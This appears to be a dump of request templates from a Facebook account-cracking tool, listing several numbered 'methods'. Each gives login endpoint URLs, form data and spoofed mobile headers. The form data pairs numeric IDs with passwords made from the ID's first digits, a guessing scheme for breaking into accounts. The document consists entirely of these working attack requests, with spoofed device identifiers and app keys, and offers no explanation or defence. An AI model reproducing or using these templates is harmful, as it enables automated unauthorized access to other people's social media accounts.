
#-------------------[ METHOD 01 ]------------------------#

TANIM URL : https://touch.facebook.com/login/?next&ref=dbl&fl&login_from_aymh=1&refid=8
--------------------------------------------------
 TANIM DATA : None
--------------------------------------------------
 TANIM HEADERS : None
--------------------------------------------------

 TANIM URL : https://touch.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100
--------------------------------------------------          TANIM DATA : {'m_ts': '1727713431', 'li': 'l9D6ZsbEYdDyAhmnAGFrmxVW', 'try_number': 0, 'unrecognized_tries': 0, 'email': '886824228', 'prefill_contact_point': '886824228 886824', 'prefill_source': 'browser_dropdown', 'prefill_type': 'password', 'first_prefill_source': 'browser_dropdown', 'first_prefill_type': 'contact_point', 'had_cp_prefilled': True, 'had_password_prefilled': True, 'is_smart_lock': False, 'bi_xrwh': 0, 'bi_wvdp': '{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false,"iframeProto":"function get contentWindow() { [native code] }","remap":false,"iframeData":{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false}}', 'encpass': '#PWD_BROWSER:0:1727713430:886824', 'jazoest': '21014', 'lsd': 'AVqqXNtZOuE'}
--------------------------------------------------
 TANIM HEADERS : {'Host': 'touch.facebook.com', 'x-fb-rlafr': '0', 'access-control-allow-origin': '*', 'facebook-api-version': 'v8.0', 'strict-transport-security': 'max-age=15552000; preload', 'pragma': 'no-cache', 'cache-control': 'max-age=0', 'x-fb-debug': 'RW01gY2TTCMqIdYqyuqmeF1CqLG/4X9gWARBaqVi0LMUgCHNzLdLS+5lvlLnRgplESoVeUHKj4pMGYJWZrDACA==', 'content-length': '0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Android"', 'save-data': 'on', 'upgrade-insecure-requests': '1', 'origin': 'https://touch.facebook.com', 'content-type': 'application/x-www-form-urlencoded', 'user-agent': 'Mozilla/5.0 (Linux; Android 7; HD1901; Windows 10 Mobile) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/96.0.4382.135 Mobile Safari/537.36', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'empty', 'referer': 'https://touch.facebook.com/login.php?skip_api_login=1&api_key=290293790992170&kid_directed_site=0&app_id=290293790992170&signed_next=1&next=https%3A%2F%2Ffree.facebook.com%2Fv8.0%2Fdialog%2Foauth%3Fcct_prefetching%3D0%26client_id%3D290293790992170%26cbt%3D1684773097456%26e2e%3D%257B%2522init%2522%253A1684773097456%257D%26ies%3D0%26sdk%3Dandroid-android-8.2.0%26sso%3Dchrome_custom_tab%26scope%3Dpublic_profile%252Cemail%252Cuser_location%26state%3D%257B%257D%26default_audience%3Dfriends%26login_behavior%3DNATIVE_WITH_FALLBACK%26redirect_uri%3Dfb290293790992170%253A%252F%252Fauthorize%26auth_type%3Drerequest%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%26return_scopes%3Dtrue%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Dad75f273-5e6b-4e07-b7dd-eab74845964f%26tp%3Dunspecified&cancel_url=fb290293790992170%3A%2F%2Fauthorize%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%257D%23_%3D_&display=touch&locale=id_ID&pl_dbl=0&refsrc=deprecated&_rdr', 'accept-encoding': 'gzip, deflate', 'accept-language': 'id-ID,id;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6'}
--------------------------------------------------

#---------------------[METHDO-03]---------------------#
  
TANIM URL : https://touch.facebook.com
--------------------------------------------------
 TANIM DATA : None
--------------------------------------------------
 TANIM HEADERS : None
--------------------------------------------------

 TANIM URL : https://touch.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100
--------------------------------------------------          TANIM DATA : {'m_ts': '1727713912', 'li': 'eNL6ZtGVNBSWGSbjzATfQUsM', 'try_number': 0, 'unrecognized_tries': 0, 'email': '99158286', 'prefill_contact_point': '99158286 991582', 'prefill_source': 'browser_dropdown', 'prefill_type': 'password', 'first_prefill_source': 'browser_dropdown', 'first_prefill_type': 'contact_point', 'had_cp_prefilled': True, 'had_password_prefilled': True, 'is_smart_lock': False, 'bi_xrwh': 0, 'bi_wvdp': '{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false,"iframeProto":"function get contentWindow() { [native code] }","remap":false,"iframeData":{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false}}', 'encpass': '#PWD_BROWSER:0:1727713911:991582', 'jazoest': '2957', 'lsd': 'AVqXVuCOz5Q'}
--------------------------------------------------
 TANIM HEADERS : {'Host': 'touch.facebook.com', 'content-length': '177', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'origin': 'https://touch.facebook.com', 'content-type': 'application/x-www-form-urlencoded', 'user-agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5A Build/H72J8I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.3419.91 Mobile Safari/537.36,gzip(gfe)', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'x-requested-with': 'mark.via.gp', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'navigate', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'document', 'referer': 'https://touch.facebook.com/login/?next&ref=dbl&fl&login_from_aymh=1&refid=8', 'accept-encoding': 'gzip, deflate', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
--------------------------------------------------

#---------------[METHOD-04]------------------#

TANIM URL : https://touch.facebook.com/login/?next&ref=dbl&fl&login_from_aymh=1&refid=8
--------------------------------------------------
 TANIM DATA : None
--------------------------------------------------
 TANIM HEADERS : None
--------------------------------------------------

 TANIM URL : https://touch.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100                     --------------------------------------------------
 TANIM DATA : {'m_ts': '1727714070', 'li': 'FtP6ZjR3NicJ5f6rSEBXd3qG', 'try_number': 0, 'unrecognized_tries': 0, 'email': '9764415390', 'prefill_contact_point': '9764415390 976441', 'prefill_source': 'browser_dropdown', 'prefill_type': 'password', 'first_prefill_source': 'browser_dropdown', 'first_prefill_type': 'contact_point', 'had_cp_prefilled': True, 'had_password_prefilled': True, 'is_smart_lock': False, 'bi_xrwh': 0, 'bi_wvdp': '{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false,"iframeProto":"function get contentWindow() { [native code] }","remap":false,"iframeData":{"hwc":true,"hwcr":false,"has_dnt":true,"has_standalone":false,"wnd_toStr_toStr":"function toString() { [native code] }","hasPerm":true,"permission_query_toString":"function query() { [native code] }","permission_query_toString_toString":"function toString() { [native code] }","has_seWo":true,"has_meDe":true,"has_creds":true,"has_hwi_bt":false,"has_agjsi":false}}', 'encpass': '#PWD_BROWSER:0:1727714070:976441', 'jazoest': '2863', 'lsd': 'AVo5L_dZW04'}
--------------------------------------------------
 TANIM HEADERS : {'Host': 'touch.facebook.com', 'x-fb-rlafr': '0', 'access-control-allow-origin': '*', 'facebook-api-version': 'v8.0', 'strict-transport-security': 'max-age=15552000; preload', 'pragma': 'no-cache', 'cache-control': 'max-age=0', 'x-fb-debug': 'RW01gY2TTCMqIdYqyuqmeF1CqLG/4X9gWARBaqVi0LMUgCHNzLdLS+5lvlLnRgplESoVeUHKj4pMGYJWZrDACA==', 'content-length': '0', 'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="98"', 'sec-ch-ua-mobile': '?0', 'sec-ch-ua-platform': '"Android"', 'save-data': 'on', 'upgrade-insecure-requests': '1', 'origin': 'https://touch.facebook.com', 'content-type': 'application/x-www-form-urlencoded', 'user-agent': 'Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5A Build/XD7J29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.3470.96 Mobile Safari/537.36,gzip(gfe)', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-user': '?1', 'sec-fetch-dest': 'empty', 'referer': 'https://touch.facebook.com/login.php?skip_api_login=1&api_key=290293790992170&kid_directed_site=0&app_id=290293790992170&signed_next=1&next=https%3A%2F%2Ffree.facebook.com%2Fv8.0%2Fdialog%2Foauth%3Fcct_prefetching%3D0%26client_id%3D290293790992170%26cbt%3D1684773097456%26e2e%3D%257B%2522init%2522%253A1684773097456%257D%26ies%3D0%26sdk%3Dandroid-android-8.2.0%26sso%3Dchrome_custom_tab%26scope%3Dpublic_profile%252Cemail%252Cuser_location%26state%3D%257B%257D%26default_audience%3Dfriends%26login_behavior%3DNATIVE_WITH_FALLBACK%26redirect_uri%3Dfb290293790992170%253A%252F%252Fauthorize%26auth_type%3Drerequest%26response_type%3Dtoken%252Csigned_request%252Cgraph_domain%26return_scopes%3Dtrue%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3Dad75f273-5e6b-4e07-b7dd-eab74845964f%26tp%3Dunspecified&cancel_url=fb290293790992170%3A%2F%2Fauthorize%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%257D%23_%3D_&display=touch&locale=id_ID&pl_dbl=0&refsrc=deprecated&_rdr', 'accept-encoding': 'gzip, deflate', 'accept-language': 'id-ID,id;q=0.9,en-GB;q=0.8,en;q=0.7,en-US;q=0.6'}
--------------------------------------------------

#------------------[method-05]--------------------#

TANIM URL : https://b-api.facebook.com/auth/login
--------------------------------------------------
 TANIM DATA : {'email': '99620605', 'password': '996206', 'adid': '9a737287-8d85-4470-bf0e-4a64ed99eba1', 'device_id': 'd277fce0-5a89-420f-860b-81cc268b1cbd', 'family_device_id': '6aaa53e9-95d8-4f19-b3e6-c152eb2fcd26', 'session_id': 'd9e1fff0-520f-43e3-b3ab-fb80abefff3b', 'advertiser_id': '7fcdb9bc-a9e9-427f-b1f9-d17a8a9f87bc', 'reg_instance': 'e2c9f08c-fcbe-48b7-b49a-78acbbbc05cd', 'logged_out_id': '134abaf8-2dc0-4d0b-92df-2812feefeccf', 'locale': 'en_US', 'client_country_code': 'US', 'cpl': 'true', 'source': 'login', 'format': 'json', 'omit_response_on_success': 'false', 'credentials_type': 'password', 'error_detail_type': 'button_with_disabled', 'generate_session_cookies': '1', 'generate_analytics_claim': '1', 'generate_machine_id': '1', 'tier': 'regular', 'currently_logged_in_userid': '0', 'fb_api_req_friendly_name': 'authenticate', 'fb_api_caller_class': 'com.facebook.account.login.protocol.Fb4aAuthHandler', 'fb4a_shared_phone_cpl_experiment': 'fb4a_shared_phone_nonce_cpl_at_risk_v3', 'fb4a_shared_phone_cpl_group': 'enable_v3_at_risk', 'access_token': '{acess_tok}', 'api_key': '882a8490361da98702bf97a021ddc14d', 'sig': '62f8ce9f74b12f84c123cc23437a4a32'}
--------------------------------------------------
 TANIM HEADERS : {'Host': 'graph.facebook.com', 'User-Agent': '[FBAN/Orca-Android;FBAV/44.0.0.4904;[FBAN/Orca-Android;FBAV/34.0.0.1279;FBPN/com.facebook.orca;FBLC/bn_IN;FBBV/3539447;FBCR/Banglalink;FBMF/OPPO;FBBD/OPPO;FBDV/SM-G985F;FBSV/11;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2246};FB_FW/1;]', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive', 'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 'X-FB-SIM-HNI': '39273', 'X-FB-Net-HNI': '26227', 'X-FB-Connection-Bandwidth': '38105008', 'X-FB-Connection-Quality': 'EXCELLENT', 'X-FB-Connection-Type': 'MOBILE.LTE', 'X-FB-HTTP-Engine': 'Liger', 'X-FB-Client-IP': 'True', 'X-FB-Friendly-Name': 'authenticate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '1026'}
